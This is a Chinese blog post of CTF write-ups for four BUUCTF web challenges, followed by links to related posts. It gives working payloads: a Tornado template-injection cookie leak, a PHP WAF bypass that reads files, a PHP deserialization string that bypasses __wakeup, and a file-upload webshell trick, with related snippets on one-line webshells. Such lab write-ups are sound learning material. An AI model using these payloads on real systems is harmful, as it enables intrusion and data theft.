BUUctf刷题日记(四道题一个wp)

最新推荐文章于 2024-08-04 01:44:52 发布
最新推荐文章于 2024-08-04 01:44:52 发布
阅读量274 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/117969642
版权

第13题开始了,以前的做过了

[护网杯 2018]easy_tornado

这是一道模板注入题,我看了没思路,看了wp才知道
我还没见过这种模板…
模板注入第一步,让他报错
通过{{handler.settings}},可以获取到cookie
我觉得有点神奇,模板注入这块我不是很懂,可以参考这个
博客
在这里插入图片描述
然后根据提示的公式,计算md5

import hashlib
hash = hashlib.md5()

filename='/fllllllllllllag'
cookie_secret="b978746f-d335-49da-995b-6fdd7c101423"
hash.update(filename.encode('utf-8'))
s1=hash.hexdigest()
hash = hashlib.md5()
hash.update((cookie_secret+s1).encode('utf-8'))
print(hash.hexdigest())

在这里插入图片描述
flag就出来了,害,有学到个模板,虽然原理有点一知半解

[RoarCTF 2019]Easy Calc

源码给了个路径,打开是个waf
发现这是个命令执行题
在这里插入图片描述
首先变量num不允许传递字母,我们可以加个空格,字符就变成了 num,在php解析的时候会自动去掉空格。
我们可以这么写?%20num=1;var_dump(scandir("/"))
问题是/也被过滤,我们用chr(“47”)绕过
为啥要读函数这么写呢,因为在 phpinfo 中可以发现 system、exec 这一类命令执行的函数被禁用了
在这里插入图片描述
发现flag 读取他payload:

?num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述

[极客大挑战 2019]PHP

说是备份,试了备份后缀,扫扫扫
www.zip
下载下来
发现是个反序列化问题
在这里插入图片描述

源码是
在这里插入图片描述
只需要user=admin,pass=100

<?php
class Name
{
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
echo serialize($a);

整出来之后要绕过_wakeup
吧对象个数改成比真实个数多就行
然后吧就没了
还有一个最最最关键的问题
就是里面的变量的属性是private
我们要把类名和属性值前面加上%00
payload;

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述

[极客大挑战 2019]Upload

一看名字就是文件上传,做完休息了,明天打疫苗了
上传个马
不让我有<?
在这里插入图片描述
试试我的绝活
在这里插入图片描述
看起来好像成功了,但是下一步不成功
换一个方法,写一个phtlm文件,里面写解析成php的语句,可以绕过<?这个的检测
在这里插入图片描述
修改这个Content-Type: image/jpeg
然后用蚁剑连接
我说咋连不上呢,吧https改成http,这浏览器自己换我吐了。。。
flag在根目录,不行了睡觉了

盖世大宝剑a
关注
buuctf-misc第一页wp,前32
10-27
比较乱,大概是自己写着写着写崩溃的产物,想要学习但是无从下手的状态就只能从先看wp开始 所用的基本工具: stegslove rarpasswordunlocker 7z&&bandzip audacity(解音频 archpr(真的好用 010editor java环境...
[护网 2018]easy_tornado(wp)
wikey 的博客
03-29 967
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。除此之外,在Twig模板引擎里,,{{var}} 除了可以输出传递的变量以外,还能执行一些基本的表达式然后将其结果作为该模板变量的值。msg={{1}},输出1,可以确定是模板注入。render渲染函数。
2018护网的pwn签到(详细过程)
dengshanyi7201的博客
10-14 641
目: 链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA 提取码:z5a7 首先找保护机制 难受 保护全开!! 运行一下,发现只有一个输入点。 ida分析一波 发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了...
BUUCTF-Misc-(41,60)
最新发布
Cra_Thursday9527的博客
08-04 1660
BUUCTF平台MISC方向第41至60writeup
护网REFINAL超详细WP
BadRer的博客
10-15 3842
前言 由于时间原因没有在比结束前提交flag,所以干脆写一个详细的解答过程(自认为),适合小白阅读,Pizza大佬请绕过。
护网圆满结束,还不满足?不如来看看大佬的WP扩展思路~
weixin_30881367的博客
10-22 227
护网预选 WP转载自:https://qingchenldl.github.io/2018/10/13/%E6%8A%A4%E7%BD%91%E6%9D%AFWP-BitPwn/#more WEB easy tornado 打开链接是几个文件的列表,分别打开,关注url和内容 http://49.4.79.198:31809/file?filename=Orz.txt...
2018护网——easy_dump
weixin_40709439的博客
10-19 3492
目: 链接: https://pan.baidu.com/s/1IdhDQAv02nAz0H211BoVgA 提取码: axgp 做时看到下载下来的600m,懵逼中,看到是img镜像文件当然想到的是利用diskgenuis恢复文件找特别文件再进行解密。 一直做不出,是我想的太简单了,昨天看了大佬写的wp,满怀敬佩的心复现一下 参考i春秋大佬:lem0n   实验用到的工具: k...
我的ctf刷题wp笔记
03-25
### CTF刷题WP笔记解析 #### 1. SWPUCTF 2021 新生 —— whitegive_pwnV1 本目聚焦于一个典型的CTF比中的二进制漏洞利用挑战,名为“whitegive_pwnV1”。通过对目描述的解读,我们可以深入分析其中涉及的...
经典的第一个WP7实例代码
12-04
【标】"经典的第一个WP7实例代码"涉及的是Windows Phone 7(WP7)平台的开发,这是一个微软为智能手机设计的操作系统。这个实例代码是针对初学者,旨在帮助他们理解和入门WP7应用开发。 【描述】提到的学习过程,...
一个合适wp新手的企业主
07-02
【标】"一个合适wp新手的企业主"所指的是在WordPress平台上专为初学者设计的一款企业网站模板。WordPress,简称WP,是全球最受欢迎的开源内容管理系统(CMS),它提供了丰富的主和插件,使得用户无需深入编程...
Renesas 两个功率MOSFET的HAT2210WP
01-20
瑞萨科技公司(Renesas)宣布推出具有两个功率MOSFET的HAT2210WP,封装形式是WPAK (瑞萨科技的封装代码)*1高热辐射封装,尺寸仅有5.3 × 6.1 × 0.8 mm (),用于笔记本电脑、通信设备及类似产品的DC-DC变换器中。...
如何用dvwa靶场上传文件,再用中国蚁剑连接(high)
m0_73128456的博客
11-12 2957
单击右键,点击浏览网站,然后把dvwa后面全部删除,再按回车键,输入自己靶场的用户名和密码,再把密码等级改为高级(high)然后,再找cookie值。第五步:打开中国蚁剑,增加数据,然后填写URL地址,填写自己的文件上传的位置。连接密码,这个时候,返回值为空,不要着急,只要你如下填写就行。前面是自己的IP地址,后面是自己上传文件的位置。第八步:点击你的数据,右键选择编辑数据,然后,点击请求信息,点击。第六步:先保存数据,现在还不可以,还要加靶场的cookie值。然后,加cookie值,粘贴,向我这样。
文件上传漏洞演示(一句话木马文件 + 蚁剑)
08-06 1万+
文件上传未做校验,可以上传木马文件到服务器上,从而获取服务器控制权限!
蚁剑连接一句话木马
m0_64417923的博客
05-18 8528
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
BUUCTF_MISC
热门推荐
m0_52885531的博客
05-30 2万+
BUUCTF_MISC解 第二 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
BUUCTF】Misc
xuanyulevel6的博客
07-31 1万+
BUUCTF-Misc
BUUCTF目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 1万+
BUUCTF目Misc部分wp(持续更新)
BUUCTF刷题记录——MISC部分解答(一)
u013119911的博客
08-18 7591
buuctf 解答
BUUCTF misc 解记录 一(超级详细)
qq_51090016的博客
03-16 1万+
持续更新一些不会的目,有错误的还请大佬指点N种方法解决 N种方法解决 附件下载是一个exe文件,我还运行不了。。这咋办 改成txt文件看看 好像有什么东西藏在里面 前面有个jpg 还有base,用winhex打开看看 到这没思路了,看wp base64可以表示图片 这个让我这个菜鸡人傻了 转换网站点这 转换完还能帮你另存为,真不错 扫一下就OK了 ...
WP7入门教程:创建你的第一个应用
"WP7有约 PDF" ...总结起来,"WP7有约 PDF" 是一份面向WP7应用开发新手的指南,涵盖了开发环境的设置、第一个应用的创建以及Panorama控件的使用,旨在帮助读者快速入门并熟悉WP7平台的开发环境和界面设计。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值